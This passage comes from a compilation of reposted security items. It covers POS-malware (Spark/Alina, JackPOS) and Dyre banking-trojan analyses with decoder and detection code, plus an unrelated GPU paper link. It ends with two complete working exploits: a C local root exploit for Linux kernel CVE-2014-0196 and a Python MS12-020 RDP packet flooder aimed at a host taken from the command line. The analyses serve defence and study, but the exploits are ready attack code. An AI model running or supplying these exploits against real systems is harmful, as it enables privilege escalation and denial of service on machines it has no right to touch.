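KEY_START, KEY_END, DATA_START = 18, 36, 76
MASK = 0xAA


def _xor_mask(data):
    """XOR every byte with the constant 0xAA (self-inverse)."""
    return bytes(b ^ MASK for b in data)


def _running_xor(data, key):
    """XOR data against the key repeated cyclically (self-inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _check(blob):
    if len(blob) < DATA_START:
        raise ValueError("message shorter than the %d-byte header" % DATA_START)


def decode_spark(blob):
    """Spark order: running-key XOR over the tail using the raw (still masked)
    key bytes, then XOR the whole message with 0xAA."""
    _check(blob)
    key = blob[KEY_START:KEY_END]
    return _xor_mask(blob[:DATA_START] + _running_xor(blob[DATA_START:], key))


def decode_alina(blob):
    """Alina v5.2+ order: XOR the whole message with 0xAA first, then
    running-key XOR over the tail using the unmasked key bytes."""
    _check(blob)
    unmasked = _xor_mask(blob)
    key = unmasked[KEY_START:KEY_END]
    return unmasked[:DATA_START] + _running_xor(unmasked[DATA_START:], key)


def encode_spark(plain):
    """Inverse of decode_spark: apply the two self-inverse steps in reverse order."""
    _check(plain)
    masked = _xor_mask(plain)
    key = masked[KEY_START:KEY_END]
    return masked[:DATA_START] + _running_xor(masked[DATA_START:], key)


def encode_alina(plain):
    """Inverse of decode_alina."""
    _check(plain)
    key = plain[KEY_START:KEY_END]
    return _xor_mask(plain[:DATA_START] + _running_xor(plain[DATA_START:], key))


_PRINTABLE = frozenset(string.printable.encode())


def decode_auto(blob):
    """Try the Spark order, then the Alina order; return (variant, plaintext) for the
    first whose dynamic data is printable ASCII, or (None, None) if neither is."""
    for variant, decoder in (("spark", decode_spark), ("alina", decode_alina)):
        plain = decoder(blob)
        if all(b in _PRINTABLE for b in plain[DATA_START:]):
            return variant, plain
    return None, None


# Constructed sample, not captured traffic: a 76-byte header (with a recognisable
# key region at offsets 18..35) followed by dynamic data in the bot-ID style above.
SAMPLE_HEADER = b"HDR:" + b"0" * 14 + b"KEY-BYTES-18-TO-35" + b"X" * 40
SAMPLE_PLAIN = SAMPLE_HEADER + b"id=mRtyfo56&data=constructed-sample"

if __name__ == "__main__":
    spark_blob = encode_spark(SAMPLE_PLAIN)
    print("spark decoder :", decode_spark(spark_blob)[DATA_START:])
    # An Alina-era decoder applied to Spark traffic leaves the tail masked with 0xAA.
    print("alina decoder :", decode_alina(spark_blob)[DATA_START:])
    print("auto-detected :", decode_auto(spark_blob)[0])
```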
I've written a Ruby script that decodes and parses the traffic; it can be found at spark.rb.

JackPOS

Spark and JackPOS share several techniques that relate them. The use of a compiled AutoIt script as a loader is a technique that we have not seen very much, and its use with both JackPOS and Spark is a very interesting link. Both use similar blacklist approaches as well as custom functions for finding CC data. However, JackPOS almost exclusively attempts to masquerade as Java or a Java utility. It also either copies itself directly into the %APPDATA% directory or into a Java-based sub-directory inside %APPDATA%. JackPOS uses the MAC address as a bot ID and base64-encodes the CC data found on the system in order to obfuscate the exfiltration. In case you missed the link above, here is SpiderLabs' detailed write-up on JackPOS. It seems fairly clear that these are two different variants. So while these two samples appear to be related, Spark bears a much stronger resemblance to Alina than to JackPOS.

Conclusion

There have been rumors and conjecture about the Alina source code being sold off, as well as JackPOS being a successor to the Alina code base. While I don't have a pony in the race, the Spark variant shows that someone has been updating the Alina source code recently. The Spark string that shows up in both the named pipe and the POST communication marks an obvious distinction from previous Alina versions. The use of AutoIt as a loader for both the Spark and JackPOS variants indicates that Spark could potentially have been a version in the transition from Alina to JackPOS. I believe it was Shakespeare who said, "Malware by any other name will still steal your credit card data", or something to that effect. Regardless of what you call these variants, the important part is to understand the details of this threat and how to keep your data secure.
Posted by Eric Merritt on 18 December 2014 at 09:00
Source: Alina POS malware "sparks" off a new variant - SpiderLabs
22. How GPUs Work

David Luebke, NVIDIA Research
Greg Humphreys, University of Virginia

In the early 1990s, ubiquitous interactive 3D graphics was still the stuff of science fiction. By the end of the decade, nearly every new computer contained a graphics processing unit (GPU) dedicated to providing a high-performance, visually rich, interactive 3D experience. This dramatic shift was the inevitable consequence of consumer demand for videogames, advances in manufacturing technology, and the exploitation of the inherent parallelism in the feed-forward graphics pipeline. Today, the raw computational power of a GPU dwarfs that of the most powerful CPU, and the gap is steadily widening.

Download: http://www.cs.virginia.edu/~gfx/papers/pdfs/59_HowThingsWork.pdf
23. Dyre Banking Trojan

Author: Brett Stone-Gross and Pallav Khandhar, Dell SecureWorks Counter Threat Unit™ Threat Intelligence
Date: 17 December 2014
URL: Dyre Banking Trojan | Dell SecureWorks

Summary

Threat actors regularly develop new Trojan horse malware to fuel their operations and to ensure the longevity of their botnets. After the takedowns of the Gameover Zeus and Shylock botnets, researchers predicted that a new breed of banking malware would fill the void. In early June 2014, the Dell SecureWorks Counter Threat Unit (CTU) research team discovered the Dyre banking trojan, which was being distributed by Cutwail botnet spam emails that included links to either Dropbox or Cubby file storage services. The threat actors later shifted to distribution via the Upatre downloader trojan. Dyre is also known as Dyreza, Dyzap, and Dyranges by the antivirus industry.

Capabilities

Dyre harvests credentials, primarily targeting online banking websites to perform Automated Clearing House (ACH) and wire fraud. The malware includes a modular architecture, man-in-the-browser functionality, and a backconnect server that allows threat actors to connect to a bank website through the victim's computer. The man-in-the-browser functionality is based on a unique combination of redirects to fake websites controlled by the threat actor ("web fakes") and a dynamic web inject system that allows the threat actors to manipulate a financial institution's website content. Similar to other banking trojans, Dyre hooks into the most popular web browsers to intercept traffic from a victim's system, stealing information and manipulating website content before it is rendered by the browser. Early versions of Dyre were relatively primitive, sending command and control (C2) communications and stolen data via unencrypted HTTP. Recent iterations of Dyre use SSL to encrypt all C2 communications, as well as a custom encryption algorithm.
Dyre also uses RSA cryptography to digitally sign configuration files and malware plugins to prevent tampering.

Malware distribution

Each Dyre binary has an ID value that allows the malware operators to identify the campaign associated with each compromise. These campaigns are often localized to target specific geographic regions. Since Dyre's introduction, the CTU research team has identified 21 unique Dyre campaigns (see Figure 1). As of this publication, Dyre has targeted more than 242 financial institutions.

Figure 1. Distribution of active Dyre campaigns observed by CTU researchers as of this publication. (Source: Dell SecureWorks)

Malware distribution vector

Dyre is downloaded and installed on compromised systems by the Upatre downloader trojan, which is distributed through spam emails sent by the Cutwail botnet and at least two other spam botnets. The emails contain Upatre as an embedded malware executable in a ZIP attachment (see Figure 2) or as a malicious URL. In both instances, user interaction is required to compromise the targeted system. Dyre campaigns use different lures, such as impersonating FedEx invoices, electronic faxes, and payroll or financial documents.

Figure 2. Spam email lure samples dropping Dyre via the Upatre downloader as an attachment. (Source: Dell SecureWorks)

Architecture

The Dyre malware is packed and obfuscated in multiple layers, and it is divided into two modules: the dropper and the main DLL module. The DLL module is stored in two distinct resources named payload32 and payload64, which Dyre activates on 32-bit or 64-bit Windows platforms, respectively. The malware drops a slightly modified copy of itself, using a random filename like "tlBTyLNuJkruXja.exe," in the C:\Windows folder (see Figure 3). When Dyre launches this file, malicious code is injected into svchost.exe.

Figure 3. Default location for dropped Dyre files.
(Source: Dell SecureWorks)

For persistence, Dyre registers as a system service under "Google Update Service" by adding an HKLM\SYSTEM\ControlSet001\Services\googleupdate registry key (see Figure 4).

Figure 4. Dyre's persistence mechanism. (Source: Dell SecureWorks)

The malware hides its base configuration file, RSA key, and other important data within the resource section of the Dyre DLL (see Figure 5).

Figure 5. Dyre resource section containing important data. (Source: Dell SecureWorks)

Dyre beacons to the hard-coded IP addresses listed in the base configuration file. The first request registers a bot on the C2 server. The malware sends the compromised system's operating system information to the C2 server and continues beaconing requests.

Dyre's web inject engine uses a slightly different approach than other banking trojans. The injected process hooks code into Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer, intercepting victims' credentials when they log into a bank account or other financial service. For each web browser, Dyre hooks different functions within the loaded DLLs:

Firefox: PR_Read and PR_Write functions within nspr4.dll
Chrome: ssl_read and ssl_write functions within chrome.dll
Internet Explorer: functions within wininet.dll

When a victim on a compromised system visits one of the targeted banking websites and enters login credentials, Dyre intercepts the data and sends a POST request to the threat actor's drop server. The request includes cookies and browser information. The malware can also manipulate banking website content dynamically, which can be used to circumvent two-factor authentication schemes.

Command and control traffic

Dyre contacts Google to check network connectivity and then submits a Session Traversal Utilities for NAT (STUN) binding request (see Figure 6). STUN allows a system located behind a network address translator (NAT) to discover a public IP address.

Figure 6.
Dyre's network connectivity check and STUN requests. (Source: Dell SecureWorks)

The STUN servers listed in Table 1 are hard-coded in the Dyre binary.

Table 1. Hard-coded STUN servers.

To hide its backend infrastructure, Dyre deploys a set of proxy servers that act as C2 servers. As shown in Figure 7, these servers are primarily located in North America and Europe. The threat actors have also implemented additional methods to maintain control of the botnet.

Figure 7. Geographic distribution of Dyre C2 servers. (Source: Dell SecureWorks)

Dyre uses SSL to communicate with its C2 server.
The requests use a standard structure, substituting appropriate values for the <Campaign ID>, <Bot ID>, and <Architecture> variables:

GET /<Campaign ID>/<Bot ID>/5/cert/EXT-IP/ HTTP/1.1 (Register the Bot)
GET /<Campaign ID>/<Bot ID>/0/Win_XP_32bit/1023/EXT-IP/ HTTP/1.1 (Register OS of Bot)
GET /<Campaign ID>/<Bot ID>/1/FcJgUwyCWvgLPymGiJGwUkwCVcBMmiD/EXT-IP/ (Send live signal)
GET /<Campaign ID>/<Bot ID>/5/httprdc/EXT-IP/ HTTP/1.1 (Ask for web fakes configuration data with target list)
GET /<Campaign ID>/<Bot ID>/5/respparser/EXT-IP/ HTTP/1.1 (Request dynamic web inject configuration)
GET /<Campaign ID>/<Bot ID>/5/twg<Architecture>/EXT-IP/ HTTP/1.1 (Request I2P plugin)
GET /<Campaign ID>/<Bot ID>/5/i2p<Architecture>/EXT-IP/ HTTP/1.1 (Request grabber plugin)
GET /<Campaign ID>/<Bot ID>/5/n_vnc<Architecture>/EXT-IP/ HTTP/1.1 (Request VNC plugin)
GET /<Campaign ID>/<Bot ID>/5/n_tv<Architecture>/EXT-IP/ HTTP/1.1 (Request TV plugin)
GET /<Campaign ID>/<Bot ID>/5/cfg_bc/EXT-IP/ HTTP/1.1 (Request Back Connect plugin)
GET /<Campaign ID>/<Bot ID>/14/NAT/Port%20restricted%20NAT/0/EXT-IP/ (NAT status)

Figure 8 shows a Dyre request for the configuration file identifying the list of URLs to redirect to the malicious server hosting the web fake. The C2 server's reply is encrypted with a custom encryption algorithm, and the payload is digitally signed using a 1024-bit RSA key.

Figure 8. Dyre's configuration request to the C2 server. (Source: Dell SecureWorks)

Dyre performs a man-in-the-browser attack to steal data sent to a legitimate bank website. The malware sends the stolen data to its exfiltration server in an HTTP POST request (see Figure 9).

Figure 9. Dyre HTTP POST request to exfiltration server. (Source: Dell SecureWorks)

Command and control resiliency

Since Dyre's inception, it has relied upon a set of hard-coded proxy servers to communicate with its backend infrastructure.
The threat actors have implemented two mechanisms to maintain control of the botnet if the proxies are unreachable: a domain generation algorithm and a plugin that integrates with an anonymization network called I2P.

Domain generation algorithm

Similar to other malware families, Dyre uses a domain generation algorithm (DGA) that is seeded by the current date. It generates 1,000 34-character domains per day, which are appended to one of eight country code top-level domains (ccTLDs) in Asia and the Pacific Islands: .cc, .ws, .to, .in, .hk, .cn, .tk, and .so. The following domains were generated on December 8, 2014:

y3aaa48a7056d7075c3760cdbd90a75b8f.cc
z376dfe4955a257a78944864dd0158d172.ws
a8377c5a7c390331b15c1df94fa745e38a.to
ba3be71036fc2c06d603a2b17d41ffe71a.in
c9cca04cec2588918820cf33ba4337cca8.hk
dec4f75e53d7202136164e2b26456dabdf.cn
e3d68349d47efa0d5a9a92b1239bc4d48c.tk
f85db5ce8675f53b61f00ca0e822a33312.so

CTU researchers sinkholed a Dyre DGA domain to identify sources of infection and to ascertain the number of compromised systems that resorted to the DGA for command and control. During a 24-hour interval, the sinkhole received requests from 8,815 unique IP addresses. The U.S. led the number of compromised systems with 59%, followed by Canada with 8%, Portugal with 7%, the UK with 5%, and Turkey with 3% (see Figure 10).

Figure 10. Infected Dyre bots reaching out to DGA domains. (Source: Dell SecureWorks)

I2P

The Invisible Internet Project (I2P) is an overlay network similar to Tor that offers anonymity. It provides anonymous hosting known as eepSites, which are similar to Tor's hidden services. eepSites allow users to access websites in a way that masks the true location of the server, so that it cannot be easily identified and taken down. On December 3, 2014, CTU researchers observed a Dyre sample that included the following I2P eepSite domain: nhgyzrn2p2gejk57wveao5kxa7b3nhtc4saoonjpsy65mapycaua.b32.i2p.
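A defender-side matcher for the two network artifacts described above (the C2 request-path grammar and the shape of the DGA domains), as an added example in Python that is not part of the SecureWorks report. It assumes the campaign and bot IDs are each a single path segment, that plugin names carry a "32"/"64" architecture suffix, and that the published DGA samples (one letter followed by 33 hex digits, then one of the eight ccTLDs) are representative; the proxy log lines are constructed.

```python
import re
from urllib.parse import unquote

# Request-path grammar from the report: /<Campaign ID>/<Bot ID>/<cmd>/<args...>/<external IP>/
# Campaign and bot ID formats are not documented, so each is matched as one path segment (assumption).
_C2_RE = re.compile(
    r"^/(?P<campaign>[^/\s]+)/(?P<bot>[^/\s]+)/(?P<cmd>\d+)/(?P<args>.+?)/"
    r"(?P<ext_ip>\d{1,3}(?:\.\d{1,3}){3})/$"
)

# Command-5 resources, labelled as in the report.
_CMD5_ACTIONS = {
    "cert": "register bot",
    "httprdc": "request web fakes configuration",
    "respparser": "request dynamic web inject configuration",
    "cfg_bc": "request back connect plugin",
}
# Plugin names carry an <Architecture> suffix in the report; "32"/"64" is assumed here.
_CMD5_PLUGINS = {
    "twg": "request I2P plugin",
    "i2p": "request grabber plugin",
    "n_vnc": "request VNC plugin",
    "n_tv": "request TV plugin",
}


def classify_c2_request(path):
    """Describe a Dyre-style C2 request path, or return None if it does not fit the grammar."""
    m = _C2_RE.match(path)
    if not m:
        return None
    cmd, args = int(m["cmd"]), m["args"].split("/")
    action = "unknown"
    if cmd == 0:
        action = "register OS (%s)" % args[0]
    elif cmd == 1:
        action = "keepalive"
    elif cmd == 5:
        res = args[0]
        action = _CMD5_ACTIONS.get(res, "unknown")
        for prefix, label in _CMD5_PLUGINS.items():
            arch = res[len(prefix):]
            if res.startswith(prefix) and arch in ("32", "64"):
                action = "%s (%s-bit)" % (label, arch)
    elif cmd == 14 and args[0] == "NAT" and len(args) > 1:
        action = "NAT status (%s)" % unquote(args[1])
    return {"campaign": m["campaign"], "bot": m["bot"], "cmd": cmd,
            "action": action, "ext_ip": m["ext_ip"]}


_LOG_RE = re.compile(r'^(?P<client>\S+) .*"GET (?P<path>\S+) HTTP/1\.[01]"')


def scan_proxy_log(lines):
    """Return (client, classification) for every log line whose request path matches the grammar."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        info = classify_c2_request(m["path"])
        if info:
            hits.append((m["client"], info))
    return hits


# The eight ccTLDs from the report. The label shape (one letter followed by 33 hex digits,
# 34 characters in all) is what the eight published samples share; assumed to generalise.
_DGA_RE = re.compile(r"^[a-z][0-9a-f]{33}\.(?:cc|ws|to|in|hk|cn|tk|so)$")


def looks_like_dyre_dga(domain):
    """True if a queried name has the shape of the published Dyre DGA domains."""
    return _DGA_RE.match(domain.lower().rstrip(".")) is not None


# Constructed sample proxy log (not real traffic); 198.51.100.7 is a documentation address.
SAMPLE_PROXY_LOG = [
    '10.0.0.5 - - [08/Dec/2014:10:01:02 +0000] "GET /c1234/BOTID-CONSTRUCTED/5/cert/198.51.100.7/ HTTP/1.1" 200 1024',
    '10.0.0.5 - - [08/Dec/2014:10:01:03 +0000] "GET /c1234/BOTID-CONSTRUCTED/0/Win_XP_32bit/1023/198.51.100.7/ HTTP/1.1" 200 12',
    '10.0.0.9 - - [08/Dec/2014:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '10.0.0.5 - - [08/Dec/2014:10:05:00 +0000] "GET /c1234/BOTID-CONSTRUCTED/14/NAT/Port%20restricted%20NAT/0/198.51.100.7/ HTTP/1.1" 200 2',
]

# Two of the domains published in the report for December 8, 2014, plus two non-matching controls.
SAMPLE_DNS_QUERIES = [
    "y3aaa48a7056d7075c3760cdbd90a75b8f.cc",
    "f85db5ce8675f53b61f00ca0e822a33312.so",
    "www.example.com",
    "a8377c5a7c390331b15c1df94fa745e38a.com",
]

if __name__ == "__main__":
    for client, info in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(client, info["campaign"], info["bot"], info["action"])
    for name in SAMPLE_DNS_QUERIES:
        print(name, looks_like_dyre_dga(name))
```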
Dyre's implementation of an I2P plugin has several tradeoffs. It makes the malware's backend server more difficult to trace, and the encapsulation of Dyre requests using I2P's encrypted protocol could complicate development of network-based signatures. However, I2P has not been widely adopted, so its presence may also be used to identify compromises.

Connection to Gozi Neverquest

CTU researchers have observed a relationship between the Dyre trojan and the Neverquest variant of Gozi. On several occasions, Gozi Neverquest pushed commands to download and execute a Dyre executable, and there have been other instances of Dyre issuing commands to download and execute a Gozi Neverquest executable. These examples suggest that one or more of the same threat actors are involved with both botnets, and they may leverage each trojan according to their specific needs.

Conclusion

Dyre has emerged from its early stages of development to become one of the most prominent banking trojans. Each iteration included refinements and new features to make it more powerful and robust. The version of Dyre being distributed as of this publication provides advanced capabilities with web fakes, dynamic web injects, a modular design, and multiple methods for maintaining command and control. The introduction of Dyre shortly after the takedown of Gameover Zeus shows the determination of threat actors targeting the financial vertical.

Threat indicators

The threat indicators in Table 2 can be used to detect activity related to the Dyre banking malware. The IP addresses listed in the indicators table may contain malicious content, so consider the risks before opening them in a browser.
Table 2. Threat indicators for the Dyre trojan.

Source: Dyre Banking Trojan | Dell SecureWorks
© Dell SecureWorks
24. CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

/*
 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
 * condition
 *
 * Slightly-less-than-POC privilege escalation exploit
 * For kernels >= v3.14-rc1
 *
 * Matthew Daley <mattd@bugfuzz.com>
 *
 * Usage:
 *   $ gcc cve-2014-0196-md.c -lutil -lpthread
 *   $ ./a.out
 *   [+] Resolving symbols
 *   [+] Resolved commit_creds: 0xffffffff81056694
 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
 *   [+] Doing once-off allocations
 *   [+] Attempting to overflow into a tty_struct...............
 *   [+] Got it
 *   # id
 *   uid=0(root) gid=0(root) groups=0(root)
 *
 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
 * chance that the overflow will go off the end of a slab. This does not
 * necessarily lead to an immediate kernel crash, but you should be prepared
 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
 * avoidable by reading /proc/slabinfo on systems where it is still available
 * to unprivileged users.
 *
 * Caveat: The vulnerability should be exploitable all the way from
 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
 * exploit relies on.
 *
 * Thanks to Jon Oberheide for his help on exploitation technique.
 */

#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200
#define RUN_ALLOCS    30

struct device;
struct tty_driver;
struct tty_operations;

typedef struct {
    int counter;
} atomic_t;

struct kref {
    atomic_t refcount;
};

/* Only the leading fields of the kernel's tty_struct are modelled; these are
 * the bytes the overflow writes over. */
struct tty_struct_header {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {
    commit_creds(prepare_kernel_cred(0));
    return 0;
}

/* Look a kernel symbol up in /proc/kallsyms; returns 0 if it cannot be resolved. */
unsigned long get_symbol(char *target_name) {
    FILE *f;
    unsigned long addr;
    char dummy;
    char name[256];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL)
        return 0;

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
        if (ret == 0) {
            fscanf(f, "%s\n", name);
            continue;
        }

        if (!strcmp(name, target_name)) {
            printf("[+] Resolved %s: %p\n", target_name, (void *)addr);
            fclose(f);
            return addr;
        }
    }

    printf("[-] Couldn't resolve \"%s\"\n", name);
    fclose(f);
    return 0;
}

void *overwrite_thread_fn(void *p) {
    write(slave_fd, buf, 511);
    write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
    write(slave_fd, &overwrite, sizeof(overwrite));
    return NULL;
}

int main() {
    char scratch[1024] = {0};
    void *tty_operations[64];
    int i, temp_fd_1, temp_fd_2;

    for (i = 0; i < 64; ++i)
        tty_operations[i] = payload;

    overwrite.magic                 = TTY_MAGIC;
    overwrite.kref.refcount.counter = 0x1337;
    overwrite.dev                   = (struct device *)scratch;
    overwrite.driver                = (struct tty_driver *)scratch;
    overwrite.ops                   = (struct tty_operations *)tty_operations;

    puts("[+] Resolving symbols");
    commit_creds = (commit_creds_fn)get_symbol("commit_creds");
    prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
    if (!commit_creds || !prepare_kernel_cred)
        return 1;

    puts("[+] Doing once-off allocations");
    for (i = 0; i < ONEOFF_ALLOCS; ++i)
        if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
            puts("[-] pty creation failed");
            return 1;
        }

    printf("[+] Attempting to overflow into a tty_struct...");
    fflush(stdout);

    for (i = 0; ; ++i) {
        struct termios t;
        int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
        pthread_t overwrite_thread;

        if (!(i & 0xfff)) {
            putchar('.');
            fflush(stdout);
        }

        if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
            puts("\n[-] pty creation failed");
            return 1;
        }

        for (j = 0; j < RUN_ALLOCS; ++j)
            if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
                puts("\n[-] pty creation failed");
                return 1;
            }

        close(fds[RUN_ALLOCS / 2]);
        close(fds2[RUN_ALLOCS / 2]);

        write(slave_fd, buf, 1);

        tcgetattr(master_fd, &t);
        t.c_oflag &= ~OPOST;
        t.c_lflag |= ECHO;
        tcsetattr(master_fd, TCSANOW, &t);

        if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
            puts("\n[-] Overwrite thread creation failed");
            return 1;
        }
        write(master_fd, "A", 1);
        pthread_join(overwrite_thread, NULL);

        for (j = 0; j < RUN_ALLOCS; ++j) {
            if (j == RUN_ALLOCS / 2)
                continue;

            ioctl(fds[j], 0xdeadbeef);
            ioctl(fds2[j], 0xdeadbeef);
            close(fds[j]);
            close(fds2[j]);
        }

        ioctl(master_fd, 0xdeadbeef);
        ioctl(slave_fd, 0xdeadbeef);
        close(master_fd);
        close(slave_fd);

        if (!setresuid(0, 0, 0)) {
            setresgid(0, 0, 0);
            puts("\n[+] Got it :)");
            execl("/bin/bash", "/bin/bash", NULL);
        }
    }
}

Source: [C] CVE-2014-0196: Linux kernel 12/05/2014 - Pastebin.com
25. # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org

import socket
import sys

buf=""
buf+="\x03\x00\x00\x13" # TPKT, Version 3, length 19
buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
buf+="\x03\x00\x01\xd6" # TPKT, Version 3, length 470
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x7f\x65\x82\x01\x94\x04" # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0"
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, length 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf+="\x03\x00\x00\x08" # TPKT, Version 3, length 8
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, length 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, length 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, length 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xec" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, length 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xed" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, length 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xee" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0b" # TPKT, Version 3, length 11
buf+="\x06\xd0\x00\x00\x12\x34\x00" # ITU-T Rec X.224

HOST = sys.argv[1]
PORT = 3389

for i in range(1000):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print "sending: %d bytes" % len(buf)
    s.send(buf)
    rec = s.recv(100)
    print "received: %d bytes" % len(rec)
    s.close()

# BlackBap.Org

Source: [C#] # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org i - Pastebin.com